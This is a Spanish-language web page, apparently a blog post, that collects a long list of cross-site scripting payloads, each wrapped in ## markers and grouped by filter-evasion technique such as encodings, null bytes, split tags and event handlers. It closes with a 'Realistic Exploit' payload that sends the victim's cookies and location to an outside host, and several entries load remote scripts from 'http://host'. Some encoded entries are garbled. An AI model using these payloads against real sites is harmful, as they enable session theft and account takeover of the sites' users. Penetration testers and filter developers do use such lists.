Recopilacion de Paylodas
Payloads para explotar la vulnerabilidad XSS (Cross Site Scripting)
Básico
##<script>alert(1234)</script>##1
##<script>prompt(1234)</script>##1
##<ScripT>alert(1234)</ScRipT>##1
##/<script>alert(1234)</script>##0
##<script>var m=<html><a href="//host">link</a>##1
Payload sin el TAG <script>
##<img+src="http://localhost">##1
##<DIV+STYLE="background-image: url(javascript:alert(1))">##1
##<IMG+DYNSRC="javascript:alert(1);">##1
##<IMG+LOWSRC="javascript:alert(1);">##1
##<isindex+type=image+src=1+onerror=alert(1)>##1
##<meta style="xss:expression(open(alert(1)))" />##1
##<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(1);\">##1
##<!</textarea <body onload='alert(1)'>##1
##<img+<iframe ="1" onerror="alert(1)">##1
##<iframe src="http://localhost"></iframe>##1
##<base+href="javascript:alert(1);//">##1
##<bgsound+src="javascript:alert(1);">##1
##<INPUT+TYPE="IMAGE"+SRC="javascript:alert(1);">##1
##<object+data="javascript:alert(0)">##1
##<STYLE>li+{list-style-image:url("javascript:alert(1)");}</STYLE><UL><LI>1##1
##<Layer+src="http://localhost">##1
##%3E%3Cbody%20onload=javascript:alert(1)%3E##1
##'">><marquee><h1>1</h1></marquee>##1
##</br style=a:expression(alert(1))>##1
##<font style='color:expression(alert(1))'>##1
##<embed src="data:image/svg+xml;>##1
##<frameset><frame src="xss"></frameset>##1
##<link href="http://host/xss.css">##1
##="/>%3ciframe%20src%3djavascript%3aalert%283%29%3e##1
##<object><param name="src" value="javascript:alert(0)"></param></object>##1
##<isindex action=javascript:alert(1) type=image>##1
##<b/alt="1"onmouseover=InputBox+1 language=vbs>test</b>##1
##</a onmousemove="alert(1)">##1
##'%26%26'javascript:alert%25281%2529//##1
Without Brackets##"+onmouseover="window.location='http://localhost'##1
##"+onkeypress="prompt(23)"+##1
##"+onfocus="prompt(1)"+##1
##500);alert(1);//##1
##alert(document['cookie'])##1
##with(document)alert(cookie)##1
##";location=location.hash)//#0={};alert(0)##1
##//";alert(String.fromCharCode(88,83,83))##1
##%F6%3Cimg+onmouseover=prompt(/test/)//%F6%3E##1
##"+onDblClick=prompt(123)"+##1
##"+onError=prompt(123)"+##1
##"+onReset=prompt(123)"+##1
Payloand XSS en JavaScript
##javascript:propmpt(1)##1
##javascript:eval(unescape(location.href))##1
##a="get";b="URL";c="javascript:";d="alert(1);";eval(a+b+c+d);##1
##location=location.hash.slice(1);##1
##";location=location.hash)//#0={};alert(0)##1
##location=location.hash##1
##""+{toString:alert}##1
##""+{valueOf:alert}##1
##";eval(unescape(location))//# %0Aalert(0)##1
##;location.href='http://site';//##1
XSS - With NewLine
##%";eval(unescape(location))//#%0Aprompt(0)##1
##<SCRIPT>a=/XSS/%0Aalert(a.source)</SCRIPT>##1
##%'});%0aalert(1);%20//##1
XSS - With NewLine and Comment
##<script>//>%0Aalert(1);</script>##1
XSS - Null Byte Injected
##<script%00>alert(1)</script%00>##1
##<scr%00ipt>prompt(1)</sc%00ript>##1
##<scr\0ipt>prompt(1)</sc\0ript>##1
##%00"><script>alert(1)</script>##1
XSS - Null Byte in Script Tags
##%3Cscript%3Ealert(1)%3C/script%00TESTTEST%3E##1
XSS - With Encoded NewLine
##<IMG+SRC="jav
ascript:alert(1);">##1
XSS - With Carriage Return
##<IMG+SRC="jav%0dascript:alert(1);">##1
With Encoded Carriage
Return
##<IMG+SRC="jav#x0D;ascript:alert(1);">##1
Con Tab
##<IMG+SRC="jav%09ascript:alert(1);">##1
with Encoded
Tab
##<IMG+SRC="jav	ascript:alert(1);">##1
Concatenacion
##document.write("<scr"+"ipt language=javascript src=http://localhost/></scr"+"ipt>");##1Desarrollador BlackList
##<scr<script>ipt>prompt(document.cookie)</scr</script>ipt>##1
XSS - basic XSS as parameter
name
##12&<script>alert(123)</script>=123##1
XSS - with
eval
##<img src=x:alert(alt) onerror=eval(src) alt=0>##1
XSS -
Jquery
##<img src=/ onerror=alert(1)>##1
XSS - with
eval
##a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);##1
XSS - No white space for IE
##<img/src="xss.png"alt="xss">##1
XSS - Mocha
##<IMG SRC="mocha:[code]">##1
XSS -
XHTML
##<x:scriptxmlns:x="http://www.w3.org/1999/xhtml">alert(1);</x:script>##1
XSS - Remote style
sheet
##<STYLE>@import'http://host/css';</STYLE>##1
XSS -
Special XSS
##<SCRIPT+a=">'>"SRC="http://localhost"></SCRIPT>##1
XSS - Bypass for Custom
Filters
##<scr<script>ipt>alert('XSS')</scr</script>ipt>##1
XSS - URL Encoded
##%3Cscript%3Ealert(1)%3C/script%3E##1
XSS - Null
Byte Injected
##foo%00<script>alert(document.cookie)</script>##1
XSS - Developer filter
bypass
##"><<script>alert(document.cookie);//<</script>##1
XSS -
Concatination
##><s"%2b"cript>alert(document.cookie)</s"%2B"cript>##1
XSS - Extra URL Encoded
##3Cscript%3Ealert(1)%3C%2Fscript%3E##1
XSS
- Double URL EncodedS
##%253Cscript%253Ealert(1)%253C/script%253E##1
XSS
- Full URL
Encoded
##%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e##1
XSS - Ascii Encoded
##%BCscript%BEalert(%A21%A2)%BC/script%BE##1
XSS - Overlong UTF
##%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE##1
XSS - Base64
Encoded
##<object+data="data:text/html base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>##1
XSS - Base64 Encoded
##<a HREF="data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==">ugh</a>##1
XSS - Full Base64 Encoded
##PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==##1
XSS - HTML
Encoded
##<a+href="javascript#alert(1);">##1
XSS -
UTF-8 Encoded
##<IMG+SRC=jAvascript:alert(1)>##1
XSS - UTF-8
Encoded
##<IMG+SRC=javascript:alert('X')>##1
XSS
- With uncommon event
handler
##<INPUT+TYPE="checkbox"+onDblClick=confirm(XSS)>##1
XSS - With
uncommon event handler
##<APPLET+CODE=""+CODEBASE="http://url/xss">##1
XSS - Overlong UTF
##%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE##1
XSS -
Long UTF-8
Encoded
##<IMG+SRC=javascript:alert('X')>##1
XSS - %U
Encoded
##%u0022%u003e%u003cscript%u003ealert%u0028%u0027Hello%u0027%u0029%u003c%u002fscript%u003e##1
XSS - UTF-7 Encoded
##+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-##1
XSS - Without
quotes
##<SCRIPT>alert(String.fromCharCode(88))</SCRIPT>##1
XSS - HTML Entity
Encoding
##<script>prompt('1')</script>##1
XSS - Hex Entity
Encoding
##<script>alert('xss')</script>##1
XSS - Decimal Entity
Encoding
##`ĕ™ĔąĒĖb—ĈāĔĖ@9Ġĕĕ9A`Gĕ™ĔąĒĖb##1
XSS - Octal Entity
Encoding
##tţŃŢőŠŤvŁŔŅŢŤPGŰţţGQtWţŃŢőŠŤv##1
XSS - Url Encoded HTML
Entity
##=<img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert%26%23x28;1%26%23x29;>##1
XSS - With Expression for IE
##"+style%3d"x%3aexpression(alert(1))+##1
XSS - Escaping escapes
##\";alert(1);//##1
XSS - Eating
Chars
##<img src="x:%90" title="onerror=alert(1)//">##1
XSS -
FormFeed Injected for
IE
##%3Cscript%0Caaaaa%3Ealert%2812%29%3C/script%0Caaaaa%3E##1
XSS - FormFeed
Injected for Firefox
##<script%0Caaaaa>alert(123)</script>##1
XSS - Vertical-tab Injected for
IE
##%3Cscript%0Baaa%3Ealert%28%29%3C/script%0Baaaa%3E##1
XSS - Vertical-tab
Injected for Firefox
##%3Cscript%0Baaa%3Ealert%281%29%3C/script%3E##1
XSS
- With star
##<*script>prompt(123)<*/script>##1
XSS -
Carriage Return
Injected
##<script%0Daaa>alert(1)</script%0Daaaa>##1
XSS -
Space Insertion
##<script%20TEST>alert(1)</script%20TESTTEST>##1
XSS - Non Alpha/Non
Digit
##<SCRIPT/XSSSRC="http://host"></SCRIPT>##1
XSS - No
Closing Script Tag
##<SCRIPT+SRC=http://host/##1
XSS - With Extra
Brackets
##<<SCRIPT>alert(1);//<</SCRIPT>##1
XSS -
Half-Width/Full-Width Characters
##<script>prompt(1)</script>##1
Half-Width/Full-Width Unicode
-1
##\uff1c\uff53\uff43\uff52\uff49\uff50\uff54\uff1e\uff41\uff4c\uff45\uff52\uff54\uff08\uff07\uff58\uff53\uff53\uff07\uff09\uff1c\uff0f\uff53\uff43\uff52\uff49\uff50\uff54\uff1e##1
Half-Width/Full-Width Unicode -2
##%uff1c%uff53%uff43%uff52%uff49%uff50%uff54%uff1e%uff41%uff4c%uff45%uff52%uff54%uff08%uff07%uff58%uff53%uff53%uff07%uff09%uff1c%uff0f%uff53%uff43%uff52%uff49%uff50%uff54%uff1e##1
Ful width %u
encoding
##%uff1cscript%uff1ealert(1234)%uff1c/script%uff1e##1
As a
parametername
##1&"><script>alert(1)</script>=1##1
Custom
Filter
##</scr</script>ipt><ifr<iframeame/onload=prompt()>whs##1
Realistic Exploit
##%3E%3Cbody%20onload=javascript:alert(1)# var sc=escape(document.cookie);var d=escape(document.location);var mI=new Image();mI.src="http://host?a="+d+"&b="+ sc;##1
0 Comentarios